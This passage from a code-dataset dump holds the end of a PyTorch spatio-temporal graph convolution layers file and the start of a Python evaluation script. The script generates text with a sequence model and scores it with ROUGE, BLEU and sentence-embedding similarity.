self.Ks * c_in), self.weight.reshape(self.Ks * c_in, -1)).reshape(-1, self.c_out)\r\n\r\n if self.bias is not None:\r\n x_chebconv = x_mul + self.bias\r\n else:\r\n x_chebconv = x_mul\r\n \r\n return x_chebconv\r\n\r\nclass GCNConv(nn.Module):\r\n def __init__(self, c_in, c_out, gcnconv_matrix, enable_bias, graph_conv_act_func):\r\n super(GCNConv, self).__init__()\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.gcnconv_matrix = gcnconv_matrix\r\n self.enable_bias = enable_bias\r\n self.graph_conv_act_func = graph_conv_act_func\r\n self.weight = nn.Parameter(torch.FloatTensor(self.c_in, self.c_out))\r\n if enable_bias == True:\r\n self.bias = nn.Parameter(torch.FloatTensor(self.c_out))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.initialize_parameters()\r\n\r\n def initialize_parameters(self):\r\n # For Sigmoid, Tanh or Softsign\r\n if self.graph_conv_act_func == 'sigmoid' or self.graph_conv_act_func == 'tanh' or self.graph_conv_act_func == 'softsign':\r\n init.xavier_uniform_(self.weight)\r\n\r\n # For ReLU, Softplus, Leaky ReLU, PReLU, or ELU\r\n elif self.graph_conv_act_func == 'relu' or self.graph_conv_act_func == 'softplus' or self.graph_conv_act_func == 'leakyrelu' \\\r\n or self.graph_conv_act_func == 'prelu' or self.graph_conv_act_func == 'elu':\r\n init.kaiming_uniform_(self.weight)\r\n\r\n if self.bias is not None:\r\n _out_feats_bias = self.bias.size(0)\r\n stdv_b = 1. / math.sqrt(_out_feats_bias)\r\n init.uniform_(self.bias, -stdv_b, stdv_b)\r\n\r\n def forward(self, x):\r\n batch_size, c_in, T, n_vertex = x.shape\r\n\r\n x_first_mul = torch.mm(x.reshape(-1, c_in), self.weight).reshape(n_vertex, -1)\r\n x_second_mul = torch.mm(self.gcnconv_matrix, x_first_mul).reshape(-1, self.c_out)\r\n\r\n if self.bias is not None:\r\n x_gcnconv_out = x_second_mul + self.bias\r\n else:\r\n x_gcnconv_out = x_second_mul\r\n \r\n return x_gcnconv_out\r\n\r\nclass GraphConvLayer(nn.Module):\r\n def __init__(self, Ks, c_in, c_out, graph_conv_type, graph_conv_matrix, graph_conv_act_func):\r\n super(GraphConvLayer, self).__init__()\r\n self.Ks = Ks\r\n self.c_in = c_in\r\n self.c_out = c_out\r\n self.align = Align(self.c_in, self.c_out)\r\n self.graph_conv_type = graph_conv_type\r\n self.graph_conv_matrix = graph_conv_matrix\r\n self.graph_conv_act_func = graph_conv_act_func\r\n self.enable_bias = True\r\n if self.graph_conv_type == \"chebconv\":\r\n self.chebconv = ChebConv(self.c_out, self.c_out, self.Ks, self.graph_conv_matrix, self.enable_bias, self.graph_conv_act_func)\r\n elif self.graph_conv_type == \"gcnconv\":\r\n self.gcnconv = GCNConv(self.c_out, self.c_out, self.graph_conv_matrix, self.enable_bias, self.graph_conv_act_func)\r\n\r\n def forward(self, x):\r\n x_gc_in = self.align(x)\r\n batch_size, c_in, T, n_vertex = x_gc_in.shape\r\n if self.graph_conv_type == \"chebconv\":\r\n x_gc = self.chebconv(x_gc_in)\r\n elif self.graph_conv_type == \"gcnconv\":\r\n x_gc = self.gcnconv(x_gc_in)\r\n x_gc_with_rc = torch.add(x_gc.reshape(batch_size, self.c_out, T, n_vertex), x_gc_in)\r\n x_gc_out = x_gc_with_rc\r\n return x_gc_out\r\n\r\nclass STConvBlock(nn.Module):\r\n # STConv Block contains 'TGTND' structure\r\n # T: Gated Temporal Convolution Layer (GLU or GTU)\r\n # G: Graph Convolution Layer (ChebConv or GCNConv)\r\n # T: Gated Temporal Convolution Layer (GLU or GTU)\r\n # N: Layer Normolization\r\n # D: Dropout\r\n\r\n def __init__(self, Kt, Ks, n_vertex, last_block_channel, channels, gated_act_func, graph_conv_type, graph_conv_matrix, drop_rate):\r\n super(STConvBlock, self).__init__()\r\n self.Kt = Kt\r\n self.Ks = Ks\r\n self.n_vertex = n_vertex\r\n self.last_block_channel = last_block_channel\r\n self.channels = channels\r\n self.gated_act_func = gated_act_func\r\n self.enable_gated_act_func = True\r\n self.graph_conv_type = graph_conv_type\r\n self.graph_conv_matrix = graph_conv_matrix\r\n self.graph_conv_act_func = 'relu'\r\n self.drop_rate = drop_rate\r\n self.tmp_conv1 = TemporalConvLayer(self.Kt, self.last_block_channel, self.channels[0], self.n_vertex, self.gated_act_func, self.enable_gated_act_func)\r\n self.graph_conv = GraphConvLayer(self.Ks, self.channels[0], self.channels[1], self.graph_conv_type, self.graph_conv_matrix, self.graph_conv_act_func)\r\n self.tmp_conv2 = TemporalConvLayer(self.Kt, self.channels[1], self.channels[2], self.n_vertex, self.gated_act_func, self.enable_gated_act_func)\r\n self.tc2_ln = nn.LayerNorm([self.n_vertex, self.channels[2]])\r\n self.sigmoid = nn.Sigmoid()\r\n self.tanh = nn.Tanh()\r\n self.relu = nn.ReLU()\r\n self.softplus = nn.Softplus()\r\n self.leakyrelu = nn.LeakyReLU()\r\n self.prelu = nn.PReLU()\r\n self.elu = nn.ELU()\r\n self.do = nn.Dropout(p=self.drop_rate)\r\n\r\n def forward(self, x):\r\n x_tmp_conv1 = self.tmp_conv1(x)\r\n x_graph_conv = self.graph_conv(x_tmp_conv1)\r\n if self.graph_conv_act_func == 'sigmoid':\r\n x_act_func = self.sigmoid(x_graph_conv)\r\n elif self.graph_conv_act_func == 'tanh':\r\n x_act_func = self.tanh(x_graph_conv)\r\n elif self.graph_conv_act_func == 'softsign':\r\n x_act_func = self.softsign(x_graph_conv)\r\n elif self.graph_conv_act_func == 'relu':\r\n x_act_func = self.relu(x_graph_conv)\r\n elif self.graph_conv_act_func == 'softplus':\r\n x_act_func = self.softplus(x_graph_conv)\r\n elif self.graph_conv_act_func == 'leakyrelu':\r\n x_act_func = self.leakyrelu(x_graph_conv)\r\n elif self.graph_conv_act_func == 'prelu':\r\n x_act_func = self.prelu(x_graph_conv)\r\n elif self.graph_conv_act_func == 'elu':\r\n x_act_func = self.elu(x_graph_conv)\r\n x_tmp_conv2 = self.tmp_conv2(x_act_func)\r\n x_tc2_ln = self.tc2_ln(x_tmp_conv2.permute(0, 2, 3, 1)).permute(0, 3, 1, 2)\r\n x_do = self.do(x_tc2_ln)\r\n x_st_conv_out = x_do\r\n return x_st_conv_out\r\n\r\nclass OutputBlock(nn.Module):\r\n # Output block contains 'TNFF' structure\r\n # T: Gated Temporal Convolution Layer (GLU or GTU)\r\n # N: Layer Normolization\r\n # F: Fully-Connected Layer\r\n # F: Fully-Connected Layer\r\n\r\n def __init__(self, Ko, last_block_channel, channels, end_channel, n_vertex, gated_act_func, drop_rate):\r\n super(OutputBlock, self).__init__()\r\n self.Ko = Ko\r\n self.last_block_channel = last_block_channel\r\n self.channels = channels\r\n self.end_channel = end_channel\r\n self.n_vertex = n_vertex\r\n self.gated_act_func = gated_act_func\r\n self.enable_gated_act_func = True\r\n self.drop_rate = drop_rate\r\n self.tmp_conv1 = TemporalConvLayer(self.Ko, self.last_block_channel, self.channels[0], self.n_vertex, self.gated_act_func, self.enable_gated_act_func)\r\n self.fc1 = nn.Linear(self.channels[0], self.channels[1])\r\n self.fc2 = nn.Linear(self.channels[1], self.end_channel)\r\n self.tc1_ln = nn.LayerNorm([self.n_vertex, self.channels[0]])\r\n self.act_func = 'sigmoid'\r\n self.sigmoid = nn.Sigmoid()\r\n self.tanh = nn.Tanh()\r\n self.softsign = nn.Softsign()\r\n self.relu = nn.ReLU()\r\n self.softplus = nn.Softplus()\r\n self.leakyrelu = nn.LeakyReLU()\r\n self.prelu = nn.PReLU()\r\n self.elu = nn.ELU()\r\n self.do = nn.Dropout(p=self.drop_rate)\r\n\r\n def forward(self, x):\r\n x_tc1 = self.tmp_conv1(x)\r\n x_tc1_ln = self.tc1_ln(x_tc1.permute(0, 2, 3, 1))\r\n x_fc1 = self.fc1(x_tc1_ln)\r\n if self.act_func == 'sigmoid':\r\n x_act_func = self.sigmoid(x_fc1)\r\n elif self.act_func == 'tanh':\r\n x_act_func = self.tanh(x_fc1)\r\n elif self.act_func == 'softsign':\r\n x_act_func = self.softsign(x_fc1)\r\n elif self.act_func == 'relu':\r\n x_act_func = self.relu(x_fc1)\r\n elif self.act_func == 'softplus':\r\n x_act_func = self.softplus(x_fc1)\r\n elif self.act_func == 'leakyrelu':\r\n x_act_func = self.leakyrelu(x_fc1)\r\n elif self.act_func == 'prelu':\r\n x_act_func = self.prelu(x_fc1)\r\n elif self.act_func == 'elu':\r\n x_act_func = self.elu(x_fc1)\r\n x_fc2 = self.fc2(x_act_func).permute(0, 3, 1, 2)\r\n x_out = x_fc2\r\n return x_out\r\n","repo_name":"sxgcase/dynGNN","sub_path":"model/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":18263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33203335956","text":"\nfrom itertools import islice\nfrom comet.train.common import *\nimport comet.train.mylogs as mylogs \nimport nltk\nimport math\nfrom nltk.tokenize import word_tokenize\nfrom comet.transformers_ptuning import PTuningWrapper\nfrom nltk.translate.bleu_score import SmoothingFunction, sentence_bleu\nfrom sentence_transformers import SentenceTransformer, util\nfrom sentence_transformers import CrossEncoder\nfrom sklearn.metrics import f1_score\nfrom rouge import Rouge\n#%% Aggregate instances of queries and corresponding responses\n# (str)split_name -> (dict) query -> (list) response \n\nfrom datasets import load_metric\nimport nltk\n\n\ndef forward_step(model, batch, no_model_batch, accumulation_tiny_steps=1, mode=\"train\", task_ids=None):\n for k in no_model_batch:\n if k not in [\"resp\", \"query\", \"target\", \"wrap\", \"freeze\", \"unfreeze\", \"method\", \"task\"]:\n no_model_batch[k] = no_model_batch[k].to(device)\n #if task_ids is not None:\n # result = model.forward(task_ids, add_prior=True, **batch)\n #else:\n result = model(**batch)\n logits = result[\"logits\"]\n forw_out = {\n \"logits\": logits\n }\n if \"loss\" in result: # and not \"loss_mask\" in no_model_batch:\n loss = result['loss']/accumulation_tiny_steps\n else:\n losses = torch.nn.functional.cross_entropy(\n result['logits'].reshape(-1,result['logits'].size(2)),\n no_model_batch['labels'].reshape(-1,),\n reduction='none'\n ).reshape(result['logits'].size(0),-1)\n if \"loss_mask\" in no_model_batch:\n loss_mask = no_model_batch[\"loss_mask\"]\n #loss_mask = loss_mask.to(device)\n losses = (losses * loss_mask).sum(-1) / loss_mask.sum(-1)\n loss = losses.mean()\n else:\n loss = losses.mean()\n forw_out[\"loss_batch\"] = losses\n\n forw_out[\"loss\"] = loss\n\n return forw_out\n\n\ndef evaluate1(tokenizer, eval_data_loader, model, device, seed =0, mode=\"dev\", save_path=\"\", wrap=True, task_ids=None):\n \"\"\"Evaluation.\"\"\"\n # Turn on evaluation mode which disables dropout.\n model.eval()\n\n total_loss = 0.0\n step = 0\n #set_random_seed(seed)\n\n all_idx = []\n all_preds = []\n all_labels = []\n all_gens = []\n all_resps = []\n all_queries = []\n gen_model = model\n if isinstance(model, PTuningWrapper): \n gen_model = model.underlying_model \n with torch.no_grad():\n for model_batch, no_model_batch in eval_data_loader:\n for k in model_batch:\n model_batch[k] = model_batch[k].to(device)\n for k in no_model_batch:\n if k not in [\"resp\", \"query\", \"target\", \"wrap\", \"freeze\", \"unfreeze\", \"method\"]:\n no_model_batch[k] = no_model_batch[k].to(device)\n\n decs = generate(gen_model, tokenizer, model_batch, task_ids)\n all_gens.extend(decs)\n\n forw_out = forward_step(model, model_batch, no_model_batch, mode=\"test\")\n loss = forw_out[\"loss\"].item() if \"loss\" in forw_out else 0\n total_loss += loss\n\n logits_list = forw_out[\"logits\"]\n seq_len = logits_list.size()[1]\n seq_preds = []\n for i in range(seq_len):\n pred_token_logits = logits_list[:, i, :]\n preds = torch.argmax(pred_token_logits, dim=-1)\n seq_preds.append(preds.tolist())\n _seq_preds = list(zip(*seq_preds))\n all_preds.extend(_seq_preds)\n\n if \"idx\" in no_model_batch: \n gathered_idx = no_model_batch[\"idx\"]\n all_idx.extend(gathered_idx)\n\n #labels = no_model_batch[\"labels\"][:, 1]\n # my code\n labels = model_batch[\"labels\"]#[:, 1]\n gathered_labels = labels.tolist() \n all_labels.extend(gathered_labels)\n\n all_queries.extend(no_model_batch[\"query\"])\n all_resps.extend(no_model_batch[\"resp\"])\n\n step += 1\n\n total_loss /= step\n\n #all_idx = torch.cat(all_idx, dim=0).cpu().tolist()\n #all_preds = torch.cat(all_preds, dim=0).cpu().tolist()\n #all_labels = torch.cat(all_labels, dim=0).cpu().tolist()\n preds_decs = []\n for p in all_preds:\n dec = tokenizer.convert_ids_to_tokens(p)\n preds_decs.append(dec)\n labels_decs = []\n for l in all_labels:\n l = [0 if x == -100 else x for x in l] \n dec = tokenizer.convert_ids_to_tokens(l)\n labels_decs.append(dec)\n _preds = []\n _labels = []\n _gens = []\n c = 0\n i = 0\n inps = 0\n inp = \"\"\n rows = []\n for p,l,r, g, q in zip(preds_decs, labels_decs, all_resps, all_gens, all_queries):\n _gens.append(g)\n _preds.append(p[1].lower())\n _labels.append(l[1].lower())\n resp = re.sub(r'<.*?>','', r)\n resp = resp.strip()\n if q != inp:\n inps +=1\n inp = q\n dd = {\"top\": resp, \"top_pred\": g}\n rows.append(dd)\n print(\"-\"*80)\n print(\"{}) {}\".format(i, q))\n print(\"\")\n if any(x in resp.split() for x in g.split()):\n c +=1\n print(\" \"*10,\"True:\",r, \" | \", resp)\n print(\" \"*10,\"Pred:\",p)\n print(\" \"*10,\"Gen:\",g)\n i += 1\n acc1 = c/i\n acc2 = c/inps\n print(\"{:.2f} = {}/{} | {:.2f} = {}/{}\".format(acc1,c,i, acc2, c, inps))\n batch = pd.DataFrame(data=rows)\n batch.to_csv(os.path.join(save_path, \"{:.3f}\".format(acc1)+\".tsv\"), sep=\"\\t\", index=False)\n #st_score = run_sts_benchmark(batch, st_embed)\n metric_list = [\"rouge\", \"meteor\", \"bertscore\"]\n metric_list = [\"bertscore\"]\n #summary = calc_metrics(batch[\"top_pred\"].tolist(), batch[\"top\"].tolist(), metric_list)\n bscore = 0.0 #summary[\"bertscore_f1\"]\n #eval_metric = acc_f1_metric\n eval_metric = acc_metric\n res = eval_metric(tokenizer, _preds, _labels, save_path=save_path)\n print(res)\n\n return acc1, acc2, bscore, total_loss \n\n\n\n\n# the code below refers to the https://github.com/Yale-LILY/FeTaQA/blob/main/end2end/train.py\ndef postprocess_text(preds, labels, metric_name):\n preds = [pred.strip() for pred in preds]\n labels = [label.strip() for label in labels]\n\n # rougeLSum expects newline after each sentence\n if metric_name == \"rouge\":\n preds = [\"\\n\".join(nltk.sent_tokenize(pred)) for pred in preds]\n labels = [\"\\n\".join(nltk.sent_tokenize(label)) for label in labels]\n elif metric_name == \"sacrebleu\": # sacrebleu\n labels = [[label] for label in labels]\n elif metric_name == \"bleu\":\n preds = [pred.split(' ') for pred in preds]\n labels = [[label.split(' ')] for label in labels]\n else:\n pass\n\n return preds, labels\n\ndevice = \"cpu\"\ndef set_device(dev):\n global device\n device = dev\n\n\nfrom nltk import word_tokenize, pos_tag\nfrom nltk.corpus import wordnet\n\nlemmatizer = nltk.WordNetLemmatizer()\n#nltk.download('averaged_perceptron_tagger')\n#word tokenizeing and part-of-speech tagger\ndef get_verb(document):\n tokens = [nltk.word_tokenize(sent) for sent in [document]]\n postag = [nltk.pos_tag(sent) for sent in tokens][0]\n for item in postag:\n w,t = item\n if t in [\"V\",\"VB\", \"VBD\"]:\n return w\n return \"\"\n\ndef trim_batch(\n input_ids, pad_token_id, attention_mask=None,\n):\n \"\"\"Remove columns that are populated exclusively by pad_token_id\"\"\"\n keep_column_mask = input_ids.ne(pad_token_id).any(dim=0)\n if attention_mask is None:\n return input_ids[:, keep_column_mask]\n else:\n return (input_ids[:, keep_column_mask], attention_mask[:, keep_column_mask])\n\ndef generate(model, tokenizer, batch, gen_token = \"\", gen_param = \"greedy\", at_mask=None, task_ids=None):\n skip_special = \"True\"\n #verb = get_verb(query)\n #vlog.info(\"Ignoring verb %s\", verb)\n bad_words_ids = None\n #extra_id_0 = tokenizer.convert_tokens_to_ids([\"\"])[0]\n #if verb:\n # bad_words_ids = tokenizer(verb).input_ids\n if \"@\" in gen_param:\n gen_param, skip_special = gen_param.split(\"@\")\n if gen_param == \"greedy\":\n gen_kwargs = {\n \"max_length\":40,\n \"num_beams\":5,\n \"repetition_penalty\":5.5,\n \"num_return_sequences\":1,\n \"bad_words_ids\": bad_words_ids\n }\n elif gen_param == \"top_p\" or gen_param == \"top_k\":\n gen_kwargs = {\n \"max_length\":40,\n \"do_sample\":True, \n \"top_p\":0.9, \n \"top_k\":10,\n \"num_beams\":5,\n \"temperature\": 1.0,\n \"num_return_sequences\":1, \n \"repetition_penalty\":5.5,\n \"bad_words_ids\": bad_words_ids\n }\n #batch.to(device)\n #if \"labels\" in batch:\n # gen_kwargs[\"labels\"] = batch[\"labels\"]\n if \"description_input_ids\" in batch:\n gen_kwargs[\"description_input_ids\"] = batch[\"description_input_ids\"]\n if \"description_attention_mask\" in batch:\n gen_kwargs[\"description_attention_mask\"] = batch[\"description_attention_mask\"]\n if \"knowledge_input_ids\" in batch:\n gen_kwargs[\"knowledge_input_ids\"] = batch[\"knowledge_input_ids\"]\n if \"knowledge_attention_mask\" in batch:\n gen_kwargs[\"knowledge_attention_mask\"] = batch[\"knowledge_attention_mask\"]\n if \"task\" in batch and mylogs.args(\"stype\") == \"atm\":\n gen_kwargs[\"task\"] = batch[\"task\"]\n\n input_batch = {}\n input_batch[\"input_ids\"] = batch[\"input_ids\"]\n input_batch[\"attention_mask\"] = batch[\"attention_mask\"]\n input_ids, attention_mask = trim_batch(**input_batch, pad_token_id=tokenizer.pad_token_id)\n decs = []\n input_ids = input_ids.to(device)\n attention_mask = attention_mask.to(device)\n if False: #gen_token != \"\":\n gen_token_id = tokenizer.convert_tokens_to_ids(gen_token)\n hyps = model.generate(\n input_ids,\n attention_mask=attention_mask,\n **gen_kwargs,\n decoder_start_token_id=gen_token_id)\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=False)\n else:\n #breakpoint()\n if False: #task_ids is not None:\n hyps = model.generate(task_ids, \n input_ids=input_ids,\n attention_mask=attention_mask,\n **gen_kwargs,\n )\n else:\n hyps = model.generate(\n input_ids=input_ids,\n attention_mask=attention_mask,\n **gen_kwargs,\n )\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=skip_special == \"True\")\n decs.extend(hyps)\n return decs\n# ggggggggg\ndef batch_generate(model, tokenizer, queries, batch_size=5, gen_token = \"\", gen_param = \"greedy\", at_mask=None):\n skip_special = \"True\"\n #verb = get_verb(query)\n #vlog.info(\"Ignoring verb %s\", verb)\n bad_words_ids = None\n #if verb:\n # bad_words_ids = tokenizer(verb).input_ids\n if \"@\" in gen_param:\n gen_param, skip_special = gen_param.split(\"@\")\n if gen_param == \"greedy\":\n gen_kwargs = {\n \"max_length\":160,\n \"num_beams\":5,\n \"repetition_penalty\":5.5,\n \"num_return_sequences\":1,\n \"bad_words_ids\": bad_words_ids\n }\n else: #if gen_param == \"top_p\":\n gen_kwargs = {\n \"max_length\":160,\n \"do_sample\":True, \n \"top_p\":0.9, \n \"top_k\":10,\n \"num_beams\":5,\n \"temperature\": 1.0,\n \"num_return_sequences\":1, \n \"repetition_penalty\":5.5,\n \"bad_words_ids\": bad_words_ids\n }\n gen_kwargs[\"task\"] = 0 #batch[\"task\"]\n with torch.no_grad():\n examples = queries\n decs = []\n for batch in list(chunks(queries, batch_size)):\n batch = tokenizer(batch, return_tensors=\"pt\", max_length=200, truncation=True, padding=True).to(device)\n input_ids, attention_mask = trim_batch(**batch, pad_token_id=tokenizer.pad_token_id)\n\n if False: #gen_token != \"\":\n gen_token_id = tokenizer.convert_tokens_to_ids(gen_token)\n hyps = model.generate(input_ids=input_ids,**gen_kwargs,\n attention_mask=attention_mask,\n decoder_start_token_id=gen_token_id)\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=False)\n else:\n hyps = model.generate(input_ids=input_ids,**gen_kwargs,\n attention_mask=attention_mask)\n hyps = tokenizer.batch_decode(hyps,skip_special_tokens=skip_special == \"True\")\n decs.extend(hyps)\n return decs\n\ndef bert_score(bert_scorer, hyps, refs):\n if bert_scorer == None:\n return 0, 0, 0.0\n\n hyps = [p.strip() for p in hyps]\n refs = [g.strip() for g in refs]\n\n embeddings1 = bert_scorer.encode(hyps, device=device, convert_to_tensor=True)\n embeddings2 = bert_scorer.encode(refs, device=device, convert_to_tensor=True)\n\n #Compute cosine-similarities for each sentence with each other sentence\n cosine_scores = util.pytorch_cos_sim(embeddings1, embeddings2)\n\n #Find the pairs with the highest cosine similarity scores\n pairs = []\n rows = cosine_scores.shape[0]\n cols = cosine_scores.shape[1]\n for i in range(rows):\n for j in range(cols):\n pairs.append({'index': [i, j], 'score': cosine_scores[i][j]})\n #logging.info({'index': [i, j], 'score': cosine_scores[i][j]})\n\n #Sort scores in decreasing order\n pairs = sorted(pairs, key=lambda x: x['score'], reverse=True)\n\n top = pairs[0]\n best_hyp_index = top[\"index\"][0]\n best_ref_index = top[\"index\"][1]\n\n return best_hyp_index, best_ref_index, top[\"score\"] \n\n# ################################### Evaluation #########################\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\nimport debugpy\n# vvvvvvvvvvvvvvv\n\ndef evaluate(test_set, dataloader, save_path, exp_info, val_records = 1, gen_param=\"greedy\", scorers=\"rouge\", batch_size=\"20@5\", model = None, tokenizer = None, preds_file = \"\", set_name = \"test\", rewrite_info = False, stop_level=0, seed=0, task_ids=None): \n if rewrite_info:\n save_path = os.path.join(save_path, \"full_results.tsv\")\n if Path(save_path).is_file() and rewrite:\n df = pd.read_table(save_path)\n\n for key, info in exp_info.items():\n df[key] = info\n\n mlog.info(\"Saving results %s\", save_path)\n df.to_csv(save_path, index=False, sep=\"\\t\")\n return\n\n\n mlog.info(\"Loading models for evaluation ..\")\n mlog.info(\"%s\", save_path)\n #set_random_seed(seed)\n\n #local_path = f\"{base_path}/paraphrase-multilingual-MiniLM-L12-v2\" \n #df = df.groupby(['prefix','input_text'],as_index=False)[target].agg({\"target_text\":'
'.join})\n #resp_cost_toks = re.split(\"{.*}\", anstemp)\n resp_cost_toks = [\"\",\"\", \"\", \"\", \"\", \".\"]\n if model is not None: model.eval()\n rows = []\n sel_rows = []\n mlog.info(\"Scoring...\")\n pbar = tqdm(total=len(test_set), position=0, leave=True) #,dynamic_ncols=True)\n step = 0\n if \"@\" in batch_size:\n bs, gen_bs = batch_size.split(\"@\")\n else:\n bs = batch_size\n gen_bs = max(2, bs - 5)\n bs = int(bs)\n gen_bs = int(gen_bs)\n vlog.disabled = True\n exit_loop = False\n nones = 0\n lang = \"en2en\"\n sel_inps = {}\n if preds_file:\n mlog.info(\"extention %s, %s\", preds_file, Path(preds_file).suffix) \n if Path(preds_file).suffix == \".json\":\n with open(preds_file) as json_file:\n records = json.load(json_file)\n lines = []\n test_set = []\n for item in records:\n d = (item[\"text_in\"], item[\"question\"], item[\"answer_text\"], item[\"meta\"],item[\"id\"], 0)\n test_set.append(d)\n lines.append(item[\"prediction\"])\n else:\n with open(preds_file, 'r') as infile:\n lines = infile.readlines()\n lines = lines[1:]\n l_count = 0\n ignore_special_tokens = False\n if \"@\" in gen_param:\n _, ist = gen_param.split(\"@\")\n ignore_special_tokens = ist == \"True\"\n test_iter = iter(test_set)\n bs = 2\n batches = batched(list(test_iter), bs)\n if model is not None and dataloader is not None:\n dl_iter = iter(dataloader)\n iid = 0\n old_query = \"\"\n for batch_list in batches: \n if exit_loop:\n break\n if model is not None:\n if True:\n queries = [x[\"query\"] for x in batch_list]\n hyps = batch_generate(model, tokenizer, queries, batch_size = gen_bs, gen_param=gen_param)\n else:\n batch,_ = next(dl_iter)\n if type(batch) == list:\n batch = batch[0]\n hyps = generate(model, tokenizer, batch, gen_param=gen_param, task_ids=task_ids)\n else:\n #hyps = islice(infile, len(queries))\n hyps = lines[l_count: l_count + bs]\n l_count += bs \n pbar.update(bs)\n for b, top_hyp in zip(batch_list, hyps):\n query = b[\"query\"]\n inp = b[\"event\"]\n tail = b[\"target\"]\n resp = b[\"resp\"]\n rel = \"h\" #b[\"rel\"]\n qid = step #b[\"index\"]\n repid = iid #b[\"rep\"]\n mlog.info(\"\\n%s/%s) query: %s\", step, len(test_set), query)\n mlog.info(\"\\nhyp: %s\",top_hyp)\n mlog.info(\"\\ntail: %s\",tail)\n mbp(1)\n data = {}\n if query != old_query:\n old_query = query\n iid += 1\n data[\"qid\"] = iid\n data[\"tid\"] = qid\n #rel_natural = relation_natural_mappings[rel][\"en-postfix\"] \n #rel_natural_pure = rel_natural.replace(\"{ph}\", \"\").strip()\n #top_hyp = top_hyp.replace(rel_natural_pure, \"\")\n blank = \"\"\n if \"\" in top_hyp:\n blank, top_hyp = top_hyp.split(\"\")\n if not blank: blank = \"EMPT\"\n mlog.info(\"hyp: %s\",top_hyp)\n resp_const = resp.split(tail)\n # constant words in target template\n affixes = []\n for rp in resp_const:\n affix = rp\n for const in resp_cost_toks:\n affix = affix.replace(const, \"\")\n if affix:\n affixes.append(affix.strip())\n\n for const in resp_cost_toks + affixes:\n top_hyp = top_hyp.replace(const, \"\")\n blank = blank.replace(const, \"\")\n mlog.info(\"hyp: %s\", top_hyp)\n top_hyp = top_hyp.strip()\n if not top_hyp:\n top_hyp = \"EMPT\"\n data[\"blank\"] = blank\n data[\"pred_text1\"] = str(top_hyp)\n data[\"prefix\"] = rel\n data[\"langs\"] = lang\n tail = re.sub(r'<.*?>','',tail)\n tail = tail.strip()\n data[\"target_text\"] = tail\n #if test_set.orig_df is None:\n # data[\"target_text\"] = tail\n input_text = re.sub(r'<.*?>','##',query)\n input_text = input_text.replace(\"\\n\", \"\")\n #if blank:\n # query = query.replace(\"\", \"[\" + blank + \"]\")\n # query = query.replace(\"\", \">>\" + top_hyp)\n #else:\n # query = query.replace(\"\", \">>\" + top_hyp)\n data[\"input_text\"] = inp\n data[\"query\"] = query \n data[\"resp\"] = resp\n _q = query.replace(\"<\", \"\\n<\", 1)\n _q = _q.replace(\">\", \">\\n\")\n data[\"prompt\"] = _q\n rows.append(data)\n pbar.update()\n step += 1\n\n df = pd.DataFrame(rows)\n #if test_set.orig_df is not None:\n # df = test_set.orig_df.merge(df, on=['prefix','input_text'], how='inner')\n for key, info in exp_info.items():\n if type(info) == list:\n info = \"@\".join(info)\n df[key] = info\n\n do_score(df, scorers, save_path)\n\nimport click\nfrom comet.utils.find_files import *\n\n@click.command()\n@click.option(\n \"--df_name\",\n \"-df\",\n default=\"full\",\n type=str,\n help=\"partial part of the filename (pattern)\"\n)\n@click.option(\n \"--path\",\n envvar=\"PWD\",\n # multiple=True,\n type=click.Path(),\n help=\"The current path (it is set by system)\"\n)\n@click.option(\n \"--scorers\",\n \"-sc\",\n default=\"st\",\n type=str,\n help=\"the name of scorers like rouge, bert or roug-bert to include both\"\n)\ndef do_score_w(df_name, path, scorers):\n files = find_files(df_name, path)\n for f in files:\n print(f)\n #r = input(f + \" score?\")\n if True: #r == \"y\":\n df = pd.read_table(f, low_memory=False)\n do_score(df, scorers, f)\n\nimport numpy as np\n#import tensorflow as tf\ndef run_sts_benchmark(batch, embed):\n sts_encode1 = tf.nn.l2_normalize(embed(tf.constant(batch['top'].tolist())), axis=1)\n sts_encode2 = tf.nn.l2_normalize(embed(tf.constant(batch['top_pred'].tolist())), axis=1)\n cosine_similarities = tf.reduce_sum(tf.multiply(sts_encode1, sts_encode2), axis=1)\n clip_cosine_similarities = tf.clip_by_value(cosine_similarities, -1.0, 1.0)\n scores = 1.0 - tf.acos(clip_cosine_similarities) / math.pi\n \"\"\"Returns the similarity scores\"\"\"\n return scores\n\ndef do_score(df, scorers, save_path, reval=False):\n #try:\n # nltk_path = str(nltk.data.find(\"tokenizers/punkt\"))\n # mlog.info(f\"using nltk from: {nltk_path}\")\n #except LookupError:\n # nltk.download('punkt')\n if \"st\" in scorers:\n embed = tf.saved_model.load(\"/home/pouramini/pret/sm\")\n\n base_path = \"/content/drive/MyDrive/pret\"\n if not colab:\n base_path = os.path.join(home, \"pret\")\n local_path = f\"{base_path}/paraphrase-MiniLM-L6-v2\"\n if not Path(local_path).exists():\n local_path = 'sentence-transformers/paraphrase-MiniLM-L6-v2'\n\n bert_scorer = None\n bert_metric = None\n if \"bert\" in scorers:\n bert_scorer = SentenceTransformer(local_path)\n bert_metric = load_metric(\"bertscore\")\n\n rouge_scorer = None\n if \"rouge\" in scorers:\n rouge_scorer = Rouge()\n\n local_path = f\"{base_path}/nli-roberta-base-v2\"\n if not Path(local_path).exists():\n local_path = 'sentence-transformers/nli-roberta-base-v2'\n nli_model = None\n if \"nli\" in scorers:\n nli_model = CrossEncoder(local_path)\n nli_counter = {}\n for l in nli_map:\n nli_counter[l] = 0\n counter = {\"all\":0}\n sum_match = {\"all\":0} \n mean_match = {}\n sum_bert = {\"all\":0} \n mean_bert = {}\n sum_rouge = {\"all\":0}\n mean_rouge = {}\n sum_bleu = {\"all\":0}\n mean_bleu = {}\n new_results = {}\n smoothie = SmoothingFunction().method4 # a function for smooth\n hyp_counter = [0]*5\n\n all_predictions = []\n all_golds = []\n if not reval:\n mlog.info(\"Preparing iterator ...\")\n mlog.info(\"Scoring....\")\n if scorers:\n rows = []\n pbar = tqdm(total=len(df), position=0, leave=True) #,dynamic_ncols=True)\n for step, row in df.iterrows():\n data = {}\n rel = row[\"prefix\"]\n lang = row[\"langs\"] \n scope = rel + \"_\" + lang\n if not scope in sum_bert: \n sum_bert[scope] = 0\n sum_rouge[scope] = 0\n sum_bleu[scope] = 0\n 